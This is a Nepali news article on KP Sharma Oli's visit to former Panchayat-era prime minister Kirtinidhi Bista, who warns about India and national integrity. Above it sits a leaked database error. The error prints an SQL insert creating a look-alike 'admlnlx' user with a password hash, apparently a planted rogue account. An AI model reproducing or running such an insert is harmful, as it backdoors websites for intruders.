WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B7c.9YEC0OQfVC64069pVO42xvKwUC.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 06:09:25', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस १-
नेकपा एमालेका अध्यक्ष केपी शर्मा ओली र पञ्चायतकालिन प्रधानमन्त्री कीर्तिनिधि विष्टबीच भेटवार्ता भएको छ ।राजा महेन्द्र शाहको पालाका प्रधानमन्त्री विष्टलाई भेट्न विहिबार एमाले अध्यक्ष ओली वरिष्ठ नेता झलनाथ खनाल र सल्लाहकार समितिका सभापति केशब बडाललाई लिएर विष्ट निवास ज्ञानेश्वर पुगेका थिए ।
भेटमा ओलीले ९० वर्षीय पूर्वप्रधानमन्त्री विष्टको स्वास्थ्यअवस्थाबारे जानकारी लिएका थिए । विष्टका अनुसार ओलीसँग उनको यो पहिलो भेट थियो ।
भेटमा पूर्वप्रधानमन्त्री विष्टले आफूलाई देशको सार्वभौमिकता र अखण्डताको चिन्ता रहेको भन्दै भने- ‘देशका लागि तपाईं चाहिएको छ । तपाईंबाट आशा गरेको छु मैले । पिपुल्स वान्ट्स यु, द नेशन वान्ट्स यु । देश सकिनै लागेको बेला तपाईंले जोगाउनु भो, अब पनि तपाईंबाट आशा गर्छु ।’
भेटमा बिष्टले आफू प्रधानमन्त्री भएका बेला २०२६ सालमा चीनसँगको सीमामा रहेका भारतीय चेकपोष्ट हटाएको स्मरण गर्दै भारतसँग सतर्क रहन ओलीलाई आग्रह गरे । ‘कुनै हालतमा तराई र पहाड छुट्याउन नदिनुस् । पूर्वमा लिम्बु छन्, उनीहरुलाई पनि तल झार्नुस् । तर, देश टुक्रिन नदिनुस्, अखण्ड राख्नुस्,’ भारतीय डिजाइनप्रति सचेत गराउँदै उनले भने ।ओलीसँग विष्टले भर्खरै चीन भ्रमण रद्ध गरेको विषयमा पनि चाँसो राखेका थिए ।